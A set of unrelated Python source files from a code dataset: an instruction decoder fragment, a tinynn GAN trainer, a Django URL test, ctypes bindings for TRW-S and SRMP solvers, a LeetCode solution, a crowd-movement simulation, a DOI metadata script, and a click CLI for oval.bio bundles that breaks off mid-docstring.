        # Bitwise OR
        return OrrRegisterShiftedRegisterA1
    elif instr[7:11] == "0b1101" and instr[25:27] == "0b00":
        # Logical Shift Left
        return LslRegisterA1
    elif instr[7:11] == "0b1101" and instr[25:27] == "0b01":
        # Logical Shift Right
        return LsrRegisterA1
    elif instr[7:11] == "0b1101" and instr[25:27] == "0b10":
        # Arithmetic Shift Right
        return AsrRegisterA1
    elif instr[7:11] == "0b1101" and instr[25:27] == "0b11":
        # Rotate Right
        return RorRegisterA1
    elif instr[7:11] == "0b1110":
        # Bitwise Bit Clear
        return BicRegisterShiftedRegisterA1
    elif instr[7:11] == "0b1111":
        # Bitwise NOT
        return MvnRegisterShiftedRegisterA1
    # NOTE(review): unmatched encodings fall through and return None --
    # presumably callers treat None as "undecodable"; confirm.
| StarcoderdataPython |
136131 | <reponame>lx120/tinynn<gh_stars>0
"""tinynn implementation of Deep Convolution Generative Adversarial Network."""
import argparse
import os
import matplotlib.pyplot as plt
import numpy as np
import tinynn as tn
from nets import D_cnn, D_mlp, G_cnn, G_mlp
def get_noise(size):
    """Sample latent noise of the given shape from a standard normal.

    `size` may be an int or a shape tuple, as accepted by numpy.
    """
    noise = np.random.normal(size=size)
    return noise
def train(args):
    """Train a GAN (generator G vs. discriminator D) on MNIST using tinynn.

    Expects ``args`` with: data_dir, model_type ("cnn"|"mlp"), batch_size,
    nz (latent dim), lr_g, lr_d, beta1, num_ep, output_dir, model_name.
    Writes one sample grid per epoch and the trained generator to output_dir.
    """
    # prepare dataset: concatenate train/valid/test splits into one pool,
    # since the GAN needs no held-out labels.
    mnist = tn.dataset.MNIST(args.data_dir)
    X = np.vstack([mnist.train_set[0], mnist.valid_set[0], mnist.test_set[0]])
    y = np.vstack([mnist.train_set[1], mnist.valid_set[1], mnist.test_set[1]])
    if args.model_type == "cnn":
        # CNN discriminator expects NHWC images rather than flat vectors.
        X = X.reshape((-1, 28, 28, 1))
        G_net, D_net = G_cnn(), D_cnn()
    elif args.model_type == "mlp":
        G_net, D_net = G_mlp(), D_mlp()
    else:
        raise ValueError("Invalid argument: model_type")
    # fixed noise vector: reused every epoch so sample grids are comparable.
    fix_noise = get_noise(size=(args.batch_size, args.nz))
    loss = tn.loss.SigmoidCrossEntropy()
    G = tn.model.Model(net=G_net, loss=loss,
                       optimizer=tn.optimizer.Adam(args.lr_g, beta1=args.beta1))
    D = tn.model.Model(net=D_net, loss=loss,
                       optimizer=tn.optimizer.Adam(args.lr_d, beta1=args.beta1))
    # exponential moving averages of the two losses, for logging only
    running_g_err, running_d_err = 0, 0
    iterator = tn.data_iterator.BatchIterator(batch_size=args.batch_size)
    for epoch in range(args.num_ep):
        for i, batch in enumerate(iterator(X, y)):
            # --- Train Discriminator ---
            # feed with real data (maximize log(D(x)))
            d_pred_real = D.forward(batch.inputs)
            label_real = np.ones_like(d_pred_real)
            d_real_err, d_real_grad = D.backward(
                d_pred_real, label_real)
            # feed with fake data (maximize log(1 - D(G(z))))
            noise = get_noise(size=(len(batch.inputs), args.nz))
            g_out = G.forward(noise)
            d_pred_fake = D.forward(g_out)
            label_fake = np.zeros_like(d_pred_fake)
            d_fake_err, d_fake_grad = D.backward(
                d_pred_fake, label_fake)
            # train D on the summed real+fake gradients
            d_err = d_real_err + d_fake_err
            d_grads = d_real_grad + d_fake_grad
            D.apply_grads(d_grads)
            # ---- Train Generator ---
            # maximize log(D(G(z))): reuse g_out, label fakes as real, and
            # backprop D's input gradient through G without updating D.
            d_pred_fake = D.forward(g_out)
            g_err, d_grad = D.backward(d_pred_fake, label_real)
            g_grads = G.net.backward(d_grad.wrt_input)
            G.apply_grads(g_grads)
            running_d_err = 0.9 * running_d_err + 0.1 * d_err
            running_g_err = 0.9 * running_g_err + 0.1 * g_err
            if i % 100 == 0:
                # NOTE(review): adjacent f-strings concatenate with no
                # separator, so this prints "iter-100d_err: ..." -- likely a
                # missing space; confirm intended log format before fixing.
                print(f"epoch: {epoch + 1}/{args.num_ep} iter-{i + 1}"
                      f"d_err: {running_d_err:.4f} g_err: {running_g_err:.4f}")
        # sampling: render the fixed-noise batch for this epoch
        print(f"epoch: {epoch + 1}/{args.num_ep}"
              f"d_err: {running_d_err:.4f} g_err: {running_g_err:.4f}")
        samples = G.forward(fix_noise)
        img_name = "ep%d.png" % (epoch + 1)
        if not os.path.exists(args.output_dir):
            os.makedirs(args.output_dir)
        save_path = os.path.join(args.output_dir, img_name)
        save_batch_as_images(save_path, samples)
    # save generator
    model_path = os.path.join(args.output_dir, args.model_name)
    G.save(model_path)
    print(f"Saving generator {model_path}")
print(f"Saving generator {model_path}")
def evaluate(args):
    """Load a saved MLP generator and write a grid of generated samples
    to ``<output_dir>/evaluate.png``."""
    generator = tn.model.Model(net=G_mlp(), loss=None, optimizer=None)
    model_path = os.path.join(args.output_dir, args.model_name)
    print(f"Loading model from {model_path}")
    generator.load(model_path)
    latent = get_noise(size=(128, args.nz))
    images = generator.forward(latent)
    if not os.path.exists(args.output_dir):
        os.makedirs(args.output_dir)
    save_batch_as_images(os.path.join(args.output_dir, "evaluate.png"), images)
def save_batch_as_images(path, batch, titles=None):
    """Tile a batch of 28x28 images into a 16-column grid and save as PNG.

    Parameters
    ----------
    path : str
        Destination image file.
    batch : np.ndarray
        Array with leading batch dimension m (flat 784 vectors or image
        shaped); m should be a multiple of 16 to fill the grid.
    titles : sequence, optional
        Per-image subplot titles.
    """
    m = batch.shape[0]  # batch size
    # BUG FIX: the original did `batch[:]` (a numpy *view*) followed by
    # in-place `.resize(...)`, which raises ValueError because a view does
    # not own its data. `reshape` is side-effect free and leaves the
    # caller's array untouched.
    images = batch.reshape(m, 28, 28)
    rows = m // 16
    fig, ax = plt.subplots(rows, 16, figsize=(28, 28))
    # With a single row, plt.subplots returns a 1-D axes array; normalize
    # to 2-D so ax[i][j] indexing always works.
    ax = np.atleast_2d(ax)
    cnt = 0
    for i in range(rows):
        for j in range(16):
            ax[i][j].set_xticks([])
            ax[i][j].set_yticks([])
            ax[i][j].imshow(images[cnt], cmap="gray",
                            interpolation="nearest", vmin=0, vmax=1)
            if titles is not None:
                ax[i][j].set_title(titles[cnt], fontsize=20)
            cnt += 1
    print(f"Saving {path}")
    plt.savefig(path)
    plt.close(fig)
def main(args):
    """Entry point: optionally seed the RNG, then run training and/or
    evaluation as requested by the CLI flags."""
    if args.seed >= 0:
        # a negative seed (the default) means "do not seed": run is stochastic
        tn.seeder.random_seed(args.seed)
    if args.train:
        train(args)
    if args.evaluate:
        evaluate(args)
if __name__ == "__main__":
    # Paths default relative to this file so the script works from any CWD.
    curr_dir = os.path.dirname(os.path.abspath(__file__))
    parser = argparse.ArgumentParser()
    parser.add_argument("--data_dir", type=str,
                        default=os.path.join(curr_dir, "data"))
    parser.add_argument("--model_type", default="mlp", type=str,
                        help="cnn or mlp")
    parser.add_argument("--output_dir", type=str,
                        default=os.path.join(curr_dir, "samples"))
    # seed < 0 disables seeding (see main)
    parser.add_argument("--seed", type=int, default=-1)
    parser.add_argument("--model_name", type=str, default="generator.pkl")
    # --train / --evaluate are independent switches; both may be given
    parser.add_argument("--train", action="store_true")
    parser.add_argument("--evaluate", action="store_true")
    parser.add_argument("--batch_size", type=int, default=128)
    parser.add_argument("--num_ep", default=50, type=int)
    # separate learning rates for generator and discriminator
    parser.add_argument("--lr_g", default=7.5e-4, type=float)
    parser.add_argument("--lr_d", default=2e-4, type=float)
    parser.add_argument("--beta1", default=0.5, type=float)
    parser.add_argument("--nz", default=50, type=int,
                        help="dimension of latent z vector")
    main(parser.parse_args())
| StarcoderdataPython |
1733390 | <gh_stars>0
from django.test import SimpleTestCase
from django.urls import reverse, resolve
from profiles.views import profile
class TestUserUrls(SimpleTestCase):
    """URL-resolution tests for the profiles app."""

    def test_profile_url(self):
        """The 'profile' route must resolve to the profile view function."""
        url = reverse("profile")
        # assertEqual: `assertEquals` is a deprecated alias that was removed
        # in Python 3.12's unittest.
        self.assertEqual(resolve(url).func, profile)
| StarcoderdataPython |
3271377 | # Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ctypes
import numpy
import sys
from ctypes import CFUNCTYPE, POINTER, c_double, c_int, c_int32, c_void_p, c_size_t
from numpy.ctypeslib import ndpointer
from .common import SubSolver
from ..model import walk_shape
from ..reparametrization import Reparametrization
class LPSolver(SubSolver):
    """Abstract base for LP-relaxation subsolvers that can report a
    reparametrization of the solved model."""

    def get_repametrization(self):
        # Abstract: subclasses return the Reparametrization after solve().
        raise NotImplementedError
class TRWS(LPSolver):
    """Sequential tree-reweighted message passing (TRW-S) via the external
    ``libcombilp_trws_stub.so`` shared library, bound through ctypes.

    Only unary and pairwise factors are supported.
    """
    DEFAULT_PARAMETERS = {
        'max_iterations': 2000,
        'threads': 1,
    }
    def __init__(self, model, parameters=None):
        # Build the native energy representation factor-by-factor, then
        # finalize it and create the native solver handle.
        super().__init__(model, parameters)
        self._init_library()
        self.model = model
        # third argument: number of higher-order (here: pairwise) factors
        self._energy = self._energy_create(model.number_of_variables, model.shape,
            sum(1 for x in model.factors if x.number_of_variables > 1))
        # edge_counter indexes pairwise factors in native insertion order;
        # get_repametrization relies on the same ordering below.
        edge_counter = 0
        for i, factor in enumerate(model.factors):
            if factor.number_of_variables == 1:
                self._energy_add_unary(self._energy, factor.variables[0], factor.data)
            elif factor.number_of_variables == 2:
                self._energy_add_pairwise(self._energy, edge_counter, *factor.variables, factor.data)
                edge_counter += 1
            else:
                raise RuntimeError('Unsupported factor arity.')
        self._energy_finalize(self._energy)
        self._solver = self._solver_create(self._energy)
    def __del__(self):
        # Release native resources; null the handles to guard against
        # double-free if __del__ runs more than once.
        if self._energy:
            self._energy_destroy(self._energy)
            self._energy = None
        if self._solver:
            self._solver_destroy(self._solver)
            self._solver = None
    def _init_library(self):
        # Load the stub library and declare the C signature of every entry
        # point so ctypes marshals numpy arrays / handles correctly.
        self._lib = ctypes.cdll.LoadLibrary('libcombilp_trws_stub.so')
        self._energy_create = self._lib.combilp_trws_stub_energy_create
        self._energy_create.argtypes = [c_int32, ndpointer(dtype=c_int32), c_int32]
        self._energy_create.restype = c_void_p
        self._energy_add_unary = self._lib.combilp_trws_stub_energy_add_unary
        self._energy_add_unary.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_double)]
        self._energy_add_pairwise = self._lib.combilp_trws_stub_energy_add_pairwise
        self._energy_add_pairwise.argtypes = [c_void_p, c_int32, c_int32, c_int32, ndpointer(dtype=c_double)]
        self._energy_finalize = self._lib.combilp_trws_stub_energy_finalize
        self._energy_finalize.argtypes = [c_void_p]
        self._energy_destroy = self._lib.combilp_trws_stub_energy_destroy
        self._energy_destroy.argtypes = [c_void_p]
        self._solver_create = self._lib.combilp_trws_stub_solver_create
        self._solver_create.argtypes = [c_void_p]
        self._solver_create.restype = c_void_p
        self._solve = self._lib.combilp_trws_stub_solve
        self._solve.argtypes = [c_void_p, c_int, c_int]
        self._solver_destroy = self._lib.combilp_trws_stub_destroy_solver
        self._solver_destroy.argtypes = [c_void_p]
        self._get_backward_messages = self._lib.combilp_trws_stub_get_backward_messages
        self._get_backward_messages.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_double)]
    def solve(self):
        """Run TRW-S message passing for the configured iteration budget."""
        self._solve(self._solver,
            self.parameters['max_iterations'],
            self.parameters['threads'])
    def get_repametrization(self):
        """Extract the reparametrization implied by the solver's messages.

        Backward messages are read from the native solver; forward messages
        are recomputed as column minima of the reparametrized factors.
        """
        repa = Reparametrization(self.model)
        edge_counter = 0
        for i, factor in enumerate(self.model.factors):
            if factor.number_of_variables == 2:
                self._get_backward_messages(self._solver, edge_counter,
                    repa.get_factor(i, 0))
                edge_counter += 1
                # recompute forward messages
                values = repa.get_factor_value(i)
                repa_values = repa.get_factor(i, 1)
                for label in range(factor.shape[1]):
                    minimum = values[:,label].min()
                    repa_values[label] = minimum
        return repa
class SRMP(LPSolver):
    """Sequential reweighted message passing (SRMP) via the external
    ``libcombilp_srmp_stub.so`` shared library, bound through ctypes."""
    DEFAULT_PARAMETERS = {
        'max_iterations': 2000,
    }
    def __init__(self, model, parameters=None):
        # Mirror the model into the native solver: one add_factor call per
        # factor, with C-contiguous data (asserted below).
        super().__init__(model, parameters)
        self._init_library()
        self._solver = self._create(self.model.number_of_variables, self.model.shape)
        for factor in self.model.factors:
            assert(factor.data.flags.c_contiguous)
            self._add_factor(self._solver, factor.number_of_variables,
                factor.variables, factor.data)
    def __del__(self):
        # Release the native solver handle exactly once.
        if self._solver:
            self._destroy(self._solver)
            self._solver = None
    def _init_library(self):
        # Load the stub library and declare C signatures, including the
        # message-extraction callback type used by get_repametrization.
        self._lib = ctypes.cdll.LoadLibrary('libcombilp_srmp_stub.so')
        self._message_func_type = CFUNCTYPE(None, c_size_t, POINTER(c_int32), c_int32, POINTER(c_double), POINTER(c_double))
        # allow passing a plain Python callable where the C type is expected
        self._message_func_type.from_param = self._message_func_type
        self._create = self._lib.combilp_srmp_stub_create
        self._create.argtypes = [c_int32, ndpointer(dtype=c_int32)]
        self._create.restype = c_void_p
        self._destroy = self._lib.combilp_srmp_stub_destroy
        self._destroy.argtypes = [c_void_p]
        self._add_factor = self._lib.combilp_srmp_stub_add_factor
        self._add_factor.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_int32), ndpointer(dtype=c_double)]
        self._solve = self._lib.combilp_srmp_stub_solve
        self._solve.argtypes = [c_void_p, c_int]
        self._extract_messages = self._lib.combilp_srmp_stub_extract_messages
        self._extract_messages.argtypes = [c_void_p, self._message_func_type]
    def solve(self):
        """Run SRMP for the configured iteration budget."""
        self._solve(self._solver, self.parameters['max_iterations'])
    def get_repametrization(self):
        """Collect messages from the native solver into a Reparametrization.

        The native callback delivers (factor variables, target variable,
        message); factors are matched back to the model by variable tuple.
        """
        result = Reparametrization(self.model)
        # The edge_iterator of SRMP returns factors *exactly* in our own factor
        # order which is *awesome*. :)
        current_factor = 0
        def find_factor(variables):
            # Linear scan resuming at current_factor -- correct because the
            # callback visits factors in model order (see note above).
            nonlocal current_factor
            for factor_index in range(current_factor, len(self.model.factors)):
                factor = self.model.factors[factor_index]
                if numpy.array_equal(factor.variables, variables):
                    return factor_index, factor
                current_factor = factor_index
        def func(alphas_size, alphas, beta, message, message_end):
            # alphas: variables of the factor; beta: the variable the
            # message is sent to; message: flat double buffer.
            alphas = [alphas[i] for i in range(alphas_size)]
            factor_index, factor = find_factor(alphas)
            local_variable_index = alphas.index(beta)
            r = result.get_factor(factor_index, local_variable_index)
            r[:] = message[:r.size]
        self._extract_messages(self._solver, func)
        return result
| StarcoderdataPython |
1760357 | #
# 1533. Find the Index of the Large Integer
#
# Q: https://leetcode.com/problems/find-the-index-of-the-large-integer/
# A: https://leetcode.com/problems/find-the-index-of-the-large-integer/discuss/765851/Javascript-Python3-C%2B%2B-binary-search-one-xor-two-%22middles%22
#
class Solution:
    def getIndex(self, reader: 'ArrayReader') -> int:
        """Binary-search for the index of the single larger element.

        All elements are equal except one larger one; ``reader.compareSub``
        compares subarray sums, so comparing the two halves of the current
        window tells which half hides the large element. O(log n) calls.
        """
        lo, hi = 0, reader.length() - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            if (hi - lo) % 2 == 0:
                # odd-sized window: both halves share the middle element,
                # so equal sums pinpoint the large element at mid
                outcome = reader.compareSub(lo, mid, mid, hi)
            else:
                # even-sized window: compare the two disjoint halves
                outcome = reader.compareSub(lo, mid, mid + 1, hi)
            if outcome == 0:
                return mid          # found
            if outcome < 0:
                lo = mid + 1        # large element is in the right half
            else:
                hi = mid            # large element is in the left half
        return -1                   # unreachable for valid input
| StarcoderdataPython |
126510 | '''
Created on Nov 29, 2020
@author: manik
'''
import numpy as np
import src.person_properties_util as idx
class Movement():
    """
    Vectorized movement updates for a population stored as a 2-D NumPy
    array (one row per person, columns addressed via person_properties_util).
    """

    def update_persons(self, persons: np.ndarray, size: int,
                            speed: float = 0.1,
                            heading_update_chance: float = 0.02) -> np.ndarray:
        """
        Randomly re-roll heading (x/y direction) and speed for a random
        subset of the population; mutates *persons* in place.

        Parameters
        ----------
        persons : np.ndarray
            Population matrix; columns idx.x_dir, idx.y_dir, idx.speed are
            written.
        size : int
            Number of rows (persons) in the array.
        speed : float, optional
            Mean of the newly sampled speeds, by default 0.1.
        heading_update_chance : float, optional
            Per-person probability of being re-rolled this epoch, by
            default 0.02.

        Returns
        -------
        np.ndarray
            The same (mutated) array.
        """
        # For updating the x position
        # Generate a random array with update chance for each person in
        # the population
        update = np.random.random(size=(size,))
        # Get the persons in the population who have a lower or equal to
        # chance of getting updated in this epoch
        shp = update[update <= heading_update_chance].shape
        # Update the position for the direction in which they are heading
        persons[:, idx.x_dir][update <= heading_update_chance] = np.random \
            .normal(loc=0, scale=1/3, size=shp)
        # For updating the y position, do the same (fresh random draw, so
        # x and y headings are re-rolled independently)
        update = np.random.random(size=(size,))
        shp = update[update <= heading_update_chance].shape
        persons[:, idx.y_dir][update <= heading_update_chance] = np.random \
            .normal(loc=0, scale=1/3, size=shp)
        # Update the speed by generating a random normal distribution using
        # the argument speed as the parameter
        update = np.random.random(size=(size,))
        shp = update[update <= heading_update_chance].shape
        persons[:, idx.speed][update <= heading_update_chance] = np.random \
            .normal(loc=speed, scale=speed / 3, size=shp)
        # clamp all speeds into a sane band (applies to every row)
        persons[:, idx.speed] = np.clip(persons[:, idx.speed], a_min=0.0005,
                                        a_max=0.01)
        # Return the updated array
        return persons

    def out_of_bounds(self, persons: np.ndarray, xbounds: list,
                            ybounds: list) -> np.ndarray:
        """
        Reverse the heading of anyone moving out of the given bounds;
        mutates *persons* in place.

        NOTE(review): this method indexes columns with raw integers
        (2=x, 3=y, 4=x_dir, 5=y_dir, presumably mirroring the idx module)
        -- confirm against person_properties_util.

        Parameters
        ----------
        persons : np.ndarray
            Population matrix.
        xbounds : list
            Per-person [min, max] bounds for the X axis.
        ybounds : list
            Per-person [min, max] bounds for the Y axis.

        Returns
        -------
        np.ndarray
            The same (mutated) array.
        """
        # Persons at/past the left X bound still heading left: give them a
        # new positive (rightward) x-direction
        shp = persons[:, 4][(persons[:, 2] <= xbounds[:, 0]) &
                            (persons[:, 4] < 0)].shape
        # Update them randomly using a normal distribution
        persons[:, 4][(persons[:, 2] <= xbounds[:, 0]) &
                      (persons[:, 4] < 0)] = \
            np.clip(np.random.normal(loc=0.5, scale=0.5/3, size=shp),
                    a_min=0.05, a_max=1)
        # Persons at/past the right X bound still heading right: flip to a
        # negative (leftward) x-direction
        shp = persons[:, 4][(persons[:, 2] >= xbounds[:, 1]) &
                            (persons[:, 4] > 0)].shape
        # Update them randomly using a normal distribution
        persons[:, 4][(persons[:, 2] >= xbounds[:, 1]) &
                      (persons[:, 4] > 0)] = \
            np.clip(-np.random.normal(loc=0.5, scale=0.5/3, size=shp),
                    a_min=-1, a_max=-0.05)
        # Persons at/past the bottom Y bound still heading down: give them a
        # new positive (upward) y-direction
        shp = persons[:, 5][(persons[:, 3] <= ybounds[:, 0]) &
                            (persons[:, 5] < 0)].shape
        # Update them randomly using a normal distribution
        persons[:, 5][(persons[:, 3] <= ybounds[:, 0]) &
                      (persons[:, 5] < 0)] = \
            np.clip(np.random.normal(loc=0.5, scale=0.5/3, size=shp),
                    a_min=0.05, a_max=1)
        # Persons at/past the top Y bound still heading up: flip to a
        # negative (downward) y-direction
        shp = persons[:, 5][(persons[:, 3] >= ybounds[:, 1]) &
                            (persons[:, 5] > 0)].shape
        # Update them randomly using a normal distribution
        persons[:, 5][(persons[:, 3] >= ybounds[:, 1]) &
                      (persons[:, 5] > 0)] = \
            np.clip(-np.random.normal(loc=0.5, scale=0.5/3, size=shp),
                    a_min=-1, a_max=-0.05)
        return persons

    def update_pop(self, persons: np.ndarray):
        """
        Advance positions one step: add direction * speed to x and y for
        everyone who is not in state 3 and not social-distancing; mutates
        *persons* in place.

        NOTE(review): state 3 presumably means dead/immobile -- confirm
        against the state constants used elsewhere.

        Parameters
        ----------
        persons : np.ndarray
            Population matrix.

        Returns
        -------
        np.ndarray
            The same (mutated) array.
        """
        # boolean row mask of people allowed to move
        # (name shadows the builtin `filter`; kept for byte-compatibility)
        filter = (persons[:, idx.current_state] != 3) & \
                 (persons[:, idx.social_distance] == 0)
        # x
        persons[:, 2][filter] = persons[:, 2][filter] + \
            (persons[:, 4][filter] * persons[:, 6][filter])
        # y
        persons[:, 3][filter] = persons[:, 3][filter] + \
            (persons[:, 5][filter] * persons[:, 6][filter])
        return persons
| StarcoderdataPython |
3292198 | <reponame>sjennewein/MetaDataDistiller<gh_stars>0
import re
import urllib.parse
import glob
import os
import time
from metadata import data
import json
import requests
import zipfile
import sys
from metadata import payload
def touch(fname):
    """Unix-style touch: create *fname* if missing and refresh its
    access/modification timestamps."""
    open(fname, 'a').close()
    os.utime(fname, None)
# CLI: python distill.py <doi-list-file> <output-dir-with-trailing-separator>
input = sys.argv[1]
output = sys.argv[2]

input = os.path.expanduser(input)
output = os.path.expanduser(output)

# BUG FIX: create the output directory BEFORE touching files inside it --
# the original touched missed.log first, which raises FileNotFoundError
# when the directory does not exist yet. exist_ok also replaces the old
# bare try/except around makedirs.
os.makedirs(output, exist_ok=True)
touch(output + 'missed.log')

with open(input) as f:
    content = [line.strip() for line in f]

total_time = time.time()
for doi in content:
    start_time = time.time()
    fail = None
    try:
        metadata = data.extract(doi)
    except Exception as err:
        # record the failure below; an empty dict marks "missed"
        fail = err
        metadata = {}
    # DOIs are "<registrar>/<suffix>"; group output files per registrar
    registrar = doi.split('/')[0]
    os.makedirs(output + registrar, exist_ok=True)
    if not metadata:
        with open(output + 'missed.log', 'a') as f:
            f.write(doi + '\n')
        with open(output + 'error.log', 'a') as f:
            f.write(str(fail) + '\n')
        continue
    with open(output + doi, 'w') as json_file:
        if type(metadata) is dict:
            # crossref result: already JSON-serializable
            out = json.dumps(metadata)
        elif isinstance(metadata, payload.Payload):
            # scraped result: needs the custom encoder
            out = payload.PayloadEncoder().encode(metadata)
        json_file.write(out)
    # print("--- %s seconds ---" % (time.time() - start_time))

# print("--- TOTAL: %s seconds ---" % (time.time() - total_time))
| StarcoderdataPython |
1688689 | import csv
import logging
import math
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
import click
import oval.core
import pandas as pd
from tabulate import tabulate
logger = logging.getLogger(__name__)
@click.group(context_settings={"help_option_names": ['-h', '--help']})
@click.option(
    "--log", envvar="OVAL_LOG", default="-",
    help="Log file. Use '-' for stdout.")
@click.option(
    "--log-level", default="WARNING",
    help="Log output level.")
@click.option(
    '--profiling/--no-profiling', default=False,
    help="Print performance profiling info on exit.")
@click.option(
    "--bundle", default="session.zip",
    help="oval.bio session data bundle file.")
@click.pass_context
def root(context, log, log_level, profiling, bundle):
    """
    oval.bio session bundle utilities.
    """
    # Plain namespace object carried to every subcommand via click's
    # context (@click.pass_obj); holds the global CLI options.
    class Obj:
        pass
    context.obj = obj = Obj()
    obj.log = log
    obj.log_level = log_level
    obj.profiling = profiling
    obj.bundle = bundle
    # configure logging once, up front, for all subcommands
    level = getattr(logging, obj.log_level.upper())
    oval.core.setup_logging(obj.log, level)
    logger.debug("bundle: {}".format(bundle))
logger.debug("bundle: {}".format(bundle))
@root.command()
@click.option(
    '--pattern', '-p', default='test*.py',
    help="test files to match")
@click.pass_obj
def test(obj, pattern):
    """
    Run test suite.
    """
    with oval.core.cli_context(obj):
        # discover tests relative to this package directory, not the CWD
        loader = unittest.TestLoader()
        suite = loader.discover(
            os.path.abspath(os.path.dirname(__file__)),
            pattern=pattern)
        runner = unittest.TextTestRunner(verbosity=2)
        runner.run(suite)
@root.command()
@click.pass_obj
def flake8(obj):
    """
    Run flake8.
    """
    try:
        # run flake8 with the same interpreter that runs this CLI
        subprocess.check_call([sys.executable, '-m', 'flake8'])
        print("flake8 OK")
    except subprocess.CalledProcessError as e:
        # NOTE(review): return codes other than 1 are silently ignored here
        if e.returncode == 1:
            print("\nThere were flake8 errors!")
@root.command()
@click.pass_obj
def version(obj):
    """
    Print version.
    """
    # local import -- presumably to avoid import cost/cycles at CLI startup
    import oval
    print(oval.__version__)
@root.command()
@click.pass_obj
def create(obj):
    """
    Create empty oval bundle.
    """
    # bundle path comes from the global --bundle option via cli_context
    with oval.core.cli_context(obj) as bundle:
        bundle.create()
@root.command()
@click.pass_obj
def info(obj):
    """
    Print bundle metadata.
    """
    with oval.core.cli_context(obj) as bundle:
        metadata = bundle.read_attributes()
        # replace the bulky chart_data list with just its count for display
        num_charts = len(metadata["chart_data"])
        del metadata["chart_data"]
        metadata["num_charts"] = num_charts
        print(tabulate(metadata.items()))
@root.command()
@click.pass_obj
@click.option(
    '--key', '-k', multiple=True, help="Key corresponding to value argument")
@click.option(
    '--value', '-v', multiple=True, help="Value corresponding to key argument")
def set(obj, key, value):
    """
    Set bundle metadata attributes.
    """
    # NOTE: shadows the builtin `set`, but the function name defines the
    # CLI command name, so it is kept. -k/-v options are paired positionally.
    with oval.core.cli_context(obj) as bundle:
        bundle.update_metadata(dict(zip(key, value)))
@root.command()
@click.pass_obj
@click.argument('filename')
def set_text(obj, filename):
    """
    Set bundle text that shows up on published reports. Copies the file
    specified into the bundle and points metadata to it.
    """
    # store the file inside the archive under its basename, then record
    # that name in the "text" metadata attribute
    arcname = os.path.basename(filename)
    with oval.core.edit_archive(obj.bundle) as arc_dir:
        shutil.copy2(filename, os.path.join(arc_dir, arcname))
    with oval.core.cli_context(obj) as bundle:
        bundle.write_attribute("text", arcname)
@root.command()
@click.pass_obj
@click.option(
    '--filename', '-f', help="File containing html to use for the bundle.")
def set_html(obj, filename):
    """
    Set bundle html that shows up on published reports.
    """
    # same mechanism as set_text, but records the "html" attribute
    arcname = os.path.basename(filename)
    with oval.core.edit_archive(obj.bundle) as arc_dir:
        shutil.copy2(filename, os.path.join(arc_dir, arcname))
    with oval.core.cli_context(obj) as bundle:
        bundle.write_attribute("html", arcname)
@root.command()
@click.pass_obj
@click.argument('args', nargs=-1)
def remove(obj, args):
    """
    Remove the specified metadata attributes.
    """
    # args: attribute names, variadic
    with oval.core.cli_context(obj) as bundle:
        bundle.remove_attributes(args)
@root.command()
@click.pass_obj
def list(obj):
    """
    List chart data in the bundle.
    """
    # NOTE: shadows the builtin `list`; the name defines the CLI command.
    # Charts print with their index, which other commands take as argument.
    with oval.core.cli_context(obj) as bundle:
        print(tabulate(enumerate(bundle.list_charts())))
@root.command()
@click.pass_obj
@click.option(
    '--filename', '-f', help="chart data filename")
@click.option(
    '--remove-zero/--no-remove-zero',
    '-r', help="Don't add rows with zero value in y_column", default=False)
@click.option(
    '--stroke', '-s', multiple=True,
    help="brush stroke to use for chart line", default=["steelblue"])
@click.option(
    '--stroke-width', '-w', multiple=True,
    help="brush stroke to use for chart line", default=[1.5])
@click.argument('x_column')
@click.argument('y_column', nargs=-1)
def add_chart(
        obj, filename, remove_zero, stroke, stroke_width, x_column, y_column):
    """
    Add chart data to the bundle. If multiple y_columns are specified,
    then multiple charts will be added.
    """
    with oval.core.cli_context(obj) as bundle:
        # one chart per y column; stroke/stroke-width lists are matched by
        # position, with the last value reused when the list runs short
        for i, y_col in enumerate(y_column):
            if i < len(stroke):
                st = stroke[i]
            else:
                st = stroke[-1]
            if i < len(stroke_width):
                st_w = stroke_width[i]
            else:
                st_w = stroke_width[-1]
            chart_kwargs = {
                "remove_zero": remove_zero,
                "x_column": x_column,
                "y_column": y_col,
                "stroke": st,
                "stroke_width": st_w}
            bundle.add_chart(filename, **chart_kwargs)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('args', nargs=-1)
def edit_chart(obj, index, args):
    """
    Edit chart at index INDEX to include the specified key/value pairs, where
    key value pairs are alternating arguments, e.g. KEY VALUE KEY VALUE...
    """
    with oval.core.cli_context(obj) as bundle:
        # split the flat positional list into alternating keys and values;
        # values are passed through as strings
        key = args[::2]
        value = args[1::2]
        chart_kwargs = dict(zip(key, value))
        bundle.edit_chart(int(index), **chart_kwargs)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('filename')
def copy_chart(obj, index, filename):
    """
    Copy chart at INDEX to FILENAME with TITLE.
    """
    # NOTE(review): the docstring mentions TITLE but no such argument exists
    with oval.core.cli_context(obj) as bundle:
        bundle.copy_chart(int(index), filename)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('column', nargs=-1)
@click.option(
    '--range-min', '-i', help="Range minimum", default=0)
@click.option(
    '--range-max', '-j', help="Range maximum", default=1)
@click.option(
    '--relative/--no-relative', '-r',
    help="Set range min/max such that the value space starts at zero",
    default=False)
def rescale_chart_data(
        obj, index, column, range_min, range_max, relative):
    """
    Rescales the COLUMNs of chart INDEX to be between
    RANGE_MIN and RANGE_MAX. Using the relative flag
